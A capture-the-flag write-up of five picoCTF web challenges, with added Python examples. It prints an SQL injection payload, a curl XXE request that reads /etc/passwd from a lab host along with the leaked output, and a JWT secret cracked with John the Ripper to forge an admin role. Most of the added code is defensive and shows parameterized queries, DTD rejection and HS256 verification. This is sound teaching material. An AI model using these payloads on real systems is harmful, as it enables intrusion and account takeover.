findme - 100 pts
Description
Help us test the form by submitting the username as test and password as test!
Approach
After logging in to the page using the provided credentials, we were instantly redirected to two pages that appeared to be named in Base64 encoding. I used BurpSuite to intercept and forward both requests individually, which allowed me to capture the flag.
Flag: picoCTF{proxies_all_the_way_df44c94c}
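The point of the approach above is that a browser follows 302s silently, so anything a server leaks in an intermediate Location header is only visible in a proxy or in a client that refuses to auto-follow. The script below is an added example, not part of the writeup or the challenge: it walks a redirect chain one hop at a time and base64-decodes the "id" query parameter of each hop. The URL layout (two 302s carrying the flag halves under "id", host example.invalid) is constructed for the offline demo; the writeup only says the redirect targets looked base64-encoded. http_fetch is a real urllib-based fetcher for a live target, fake_fetch stands in for the server.

```python
import base64
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urljoin, urlsplit

# Constructed for this example: the flag from the writeup, split in two and
# carried base64-encoded in the "id" parameter of consecutive redirects.
# The real challenge's URL layout is not known from the writeup.
FLAG = "picoCTF{proxies_all_the_way_df44c94c}"
HALF = len(FLAG) // 2
START = "http://example.invalid/login"


def b64url_decode(s: str) -> bytes:
    """Decode base64 or base64url, with or without the trailing '=' padding."""
    s = s.replace("-", "+").replace("_", "/")
    return base64.b64decode(s + "=" * (-len(s) % 4))


def walk_redirects(fetch, url: str, max_hops: int = 10) -> list:
    """Follow redirects one hop at a time and return every (status, url) visited.

    fetch(url) must do ONE request and return (status, Location-or-None) without
    following the redirect itself; browsers follow silently, a proxy shows each hop.
    """
    hops = []
    for _ in range(max_hops):
        status, location = fetch(url)
        hops.append((status, url))
        if location is None:
            return hops
        url = urljoin(url, location)  # Location may be relative
    raise RuntimeError("redirect chain longer than %d hops" % max_hops)


def decode_id_params(hops: list) -> str:
    """Concatenate the base64-decoded 'id' query parameter of every hop that has one."""
    parts = []
    for _, url in hops:
        for value in parse_qs(urlsplit(url).query).get("id", []):
            parts.append(b64url_decode(value).decode("utf-8", "replace"))
    return "".join(parts)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Returning None makes urllib raise HTTPError on 3xx instead of following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(url: str):
    """Fetcher for a live target (not used by the offline demo below)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(url, timeout=10) as resp:
            return resp.status, None
    except urllib.error.HTTPError as err:
        if 300 <= err.code < 400:
            return err.code, err.headers.get("Location")
        raise


def fake_fetch(url: str):
    """Constructed stand-in for the challenge server: two 302s, then a 200."""
    enc = lambda s: base64.urlsafe_b64encode(s.encode()).decode().rstrip("=")
    hop1 = "http://example.invalid/next-page?id=" + enc(FLAG[:HALF])
    hop2 = "http://example.invalid/home?id=" + enc(FLAG[HALF:])
    return {START: (302, hop1), hop1: (302, hop2), hop2: (200, None)}[url]


if __name__ == "__main__":
    chain = walk_redirects(fake_fetch, START)
    for status, url in chain:
        print(status, url)
    print("recovered:", decode_id_params(chain))
```

Swap fake_fetch for http_fetch to run it against a real host. The decoder tolerates missing base64 padding because servers often strip the trailing "=" from URL parameters, which is also why the segments "appeared to be" base64 rather than decoding cleanly in a browser.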
MatchTheRegex - 100 pts
Description
How about trying to match a regular expression
Approach
For this one we have to write a regular expression that matches the flag pattern: picoCTF.*
Flag: picoCTF{succ3ssfully_matchtheregex_08c310c6}
More SQLi - 200 pts
Description
Can you find the flag on this website.
Approach
We can see the SQL query being made in the response.
This simple SQLi payload works: ' OR 1=1 --
Flag: picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_e3e46aae}
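Why that payload works, and why the fix is a one-line change: the example below is added here and is not the challenge's code. It builds a constructed in-memory SQLite users table, shows the string-concatenated query the vulnerable login builds (the kind of query the site echoed back in its response), and puts the parameterized version beside it. The writeup does not say which field the payload went into; the test uses both.

```python
import sqlite3

PAYLOAD = "' OR 1=1 --"  # the payload from the writeup


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the challenge's database.
    (Plaintext passwords keep the demo short; a real table holds salted hashes.)"""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "constructed-admin-secret"), ("alice", "wonderland")],
    )
    return con


def rendered_query(username: str, password: str) -> str:
    """The string the vulnerable app builds: user input becomes SQL grammar."""
    return (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    """Input is spliced into the SQL text, so a quote ends the literal and
    '--' comments out the rest of the WHERE clause."""
    return con.execute(rendered_query(username, password)).fetchone()


def login_safe(con: sqlite3.Connection, username: str, password: str):
    """Input is bound as a parameter, so the same payload is just an odd literal."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(rendered_query(PAYLOAD, "anything"))
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "anything"))
    print("parameterized:", login_safe(db, PAYLOAD, "anything"))
```

With the payload in either field the vulnerable query degenerates to WHERE ... OR 1=1, which matches every row, and fetchone hands back the first user, here admin. The parameterized query returns nothing for the same input because the driver never parses the bound value as SQL.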
SOAP - 100 pts
Description
The web project was rushed and no security assessment was done. Can you read the /etc/passwd file?
Approach
Upon inspecting the page’s source code, we discovered that there is an endpoint named “/data” that uses XML, as indicated by the corresponding JavaScript file. This suggests that the application may be vulnerable to XML External Entity (XXE) attacks.
I sent this payload using curl and got the flag:
┌──(kali㉿iasad)-[~/CTFs/PicoCTF]
└─$ curl -X POST -H "Content-Type: application/xml" \
-d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE
data [ <!ENTITY test SYSTEM "file:///etc/passwd" > ]>
<data><ID>&test;</ID></data>' http://saturn.picoctf.net:53312/data
Invalid ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
flask:x:999:999::/app:/bin/sh
picoctf:x:1001:picoCTF{XML_3xtern@l_3nt1t1ty_e5f02dbf}
Flag: picoCTF{XML_3xtern@l_3nt1t1ty_e5f02dbf}
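Two things went wrong in that endpoint: the parser resolved an external entity, and the "Invalid ID: ..." error reflected the resolved value straight back to the client, which turned an entity expansion into a file read with no blind-exfiltration tricks needed. The handler below is an added example, not the challenge's code, showing how the /data endpoint should treat its input: refuse any DOCTYPE or ENTITY declaration before a parser sees the document, and answer with fixed messages that never echo the submitted ID. The request body from the writeup is reconstructed as the test input; the element names data and ID come from that request.

```python
import re
import xml.etree.ElementTree as ET

# The writeup's request body, reconstructed here as a test input.
XXE_PAYLOAD = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE data [ <!ENTITY test SYSTEM "file:///etc/passwd" > ]>'
    b"<data><ID>&test;</ID></data>"
)
BENIGN = b'<?xml version="1.0" encoding="UTF-8"?><data><ID>42</ID></data>'

# Any DOCTYPE or ENTITY declaration is refused before a parser ever sees it.
# (A comment containing these words is refused too: failing closed is the point.)
DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


class XmlRejected(ValueError):
    """Raised with a fixed message; the submitted value is never echoed back."""


def parse_id_request(body: bytes) -> int:
    if DTD_MARKER.search(body):
        raise XmlRejected("document type declarations are not accepted")
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        raise XmlRejected("malformed XML") from None
    if root.tag != "data":
        raise XmlRejected("unexpected root element")
    text = (root.findtext("ID") or "").strip()
    if not text.isdigit():
        raise XmlRejected("ID must be a positive integer")
    return int(text)


def handle(body: bytes):
    """(status, message) the /data endpoint should return: no reflection of input."""
    try:
        return 200, "ID %d accepted" % parse_id_request(body)
    except XmlRejected as err:
        return 400, str(err)


if __name__ == "__main__":
    print(handle(BENIGN))
    print(handle(XXE_PAYLOAD))
```

The pre-parse gate is deliberately independent of the parser's own settings, because those differ by library and version (Python's ElementTree does not fetch external entities, several Java and libxml2-based parsers historically did unless told otherwise); the gate holds whichever parser sits behind it. Validating the ID as an integer and using fixed error strings closes the reflection side regardless of what the parser did.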
Java Code Analysis!?!
Description
BookShelf Pico, my premium online book-reading service. I believe that my website is super secure. I challenge you to prove me wrong by reading the ‘Flag’ book! Here are the credentials to get you started:
- Username: “user”
- Password: “user”
Source code can be downloaded here
Approach
Upon logging in with the provided credentials, users are assigned the free user role. The website offers three types of user roles: free, premium, and admin. Only users with the admin role have access to the flag book.
Based on the given hints, it appears that the website is using JWT for user authentication. With this information, we can check whether it is possible to modify our user role to become an admin.
To get the authentication token, we can inspect the cookies using the Chrome Developer Tools.
jwt.io can be used to decode the token and potentially modify its contents.
In order to modify the JWT, we would need to have the secret key used to sign it. If the secret key is not sufficiently complex, it may be possible to crack it using a tool like John the Ripper. In this particular case, John the Ripper was able to crack the key in under a second because the key was a simple one - ‘1234’.
┌──(kali㉿iasad)-[~/CTFs/PicoCTF]
└─$ echo "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiRnJlZSIsImlzcyI6ImJvb2tzaGVsZiIsImV4cCI6MTY4MjU0NjM2OCwiaWF0IjoxNjgxOTQxNTY4LCJ1c2VySWQiOjEsImVtYWlsIjoidXNlciJ9.au2F6GtDI5Zoq9ihgltHoYBKbrvutqViF2A0QalxNTw" > jwt.txt
┌──(kali㉿iasad)-[~/CTFs/PicoCTF]
└─$ john jwt.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 128/128 AVX 4x])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
1234 (?)
1g 0:00:00:00 DONE 2/3 (2023-04-19 18:01) 50.00g/s
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Now that we have obtained the secret key, we can modify the token to change our user role to admin. Once we have made the necessary changes, we can load the modified token into the local storage using the inspect tool.
After loading the modified token into the local storage, we can simply refresh the page to get the flag.
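The whole attack rests on one fact: an HS256 token's claims are protected only by an HMAC under the server's secret, so a guessable secret lets anyone re-sign a token with role changed, while a strong one makes the edited token fail verification. The code below is an added example and not BookShelf's code: it decodes the writeup's token (joined into one line), implements the HS256 signing and verification a server has to do, and shows that a role edit without the key is rejected while the same claims re-signed under the key pass. The claim names role, iss, userId and email are read from the token itself; whether "1234" verifies it is printed at runtime rather than assumed.

```python
import base64
import hashlib
import hmac
import json
import secrets

# The writeup's token, joined into one line.
PAGE_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJyb2xlIjoiRnJlZSIsImlzcyI6ImJvb2tzaGVsZiIsImV4cCI6MTY4MjU0NjM2OCwiaWF0Ijox"
    "NjgxOTQxNTY4LCJ1c2VySWQiOjEsImVtYWlsIjoidXNlciJ9."
    "au2F6GtDI5Zoq9ihgltHoYBKbrvutqViF2A0QalxNTw"
)


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _compact(obj) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def jwt_claims(token: str) -> dict:
    """Read the payload WITHOUT verifying: this is all jwt.io's decoder does."""
    _, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(payload_b64))


def jwt_sign(claims: dict, key: str) -> str:
    """HS256: signature = HMAC-SHA256(key, base64url(header) + "." + base64url(payload))."""
    signing_input = _compact({"typ": "JWT", "alg": "HS256"}) + "." + _compact(claims)
    sig = hmac.new(key.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def jwt_verify(token: str, key: str) -> bool:
    """True only for a well-formed HS256 token whose MAC matches under `key`."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        given = b64url_decode(sig_b64)
    except ValueError:  # wrong part count, bad base64 or bad JSON
        return False
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return False  # refuses alg=none and any algorithm switch
    expected = hmac.new(key.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, given)


def set_role(token: str, role: str) -> str:
    """Rewrite the role claim but keep the ORIGINAL signature: what someone
    without the key can do, and exactly what jwt_verify has to reject."""
    header_b64, _, sig_b64 = token.split(".")
    claims = jwt_claims(token)
    claims["role"] = role
    return f"{header_b64}.{_compact(claims)}.{sig_b64}"


def fresh_secret() -> str:
    """What the server should have signed with: 32 random bytes, not '1234'."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    print(jwt_claims(PAGE_TOKEN))
    print("'1234' verifies the writeup's token:", jwt_verify(PAGE_TOKEN, "1234"))
    key = fresh_secret()
    tok = jwt_sign({"role": "Free", "userId": 1}, key)
    print("tampered role still verifies:", jwt_verify(set_role(tok, "Admin"), key))
```

John cracked the key in under a second because each guess costs one HMAC-SHA256, and '1234' is at the front of every wordlist; a secret from fresh_secret has 256 bits of entropy and is out of reach of that search. The verifier also pins alg to HS256, since accepting whatever algorithm the token names is the other classic way a signature check gets bypassed.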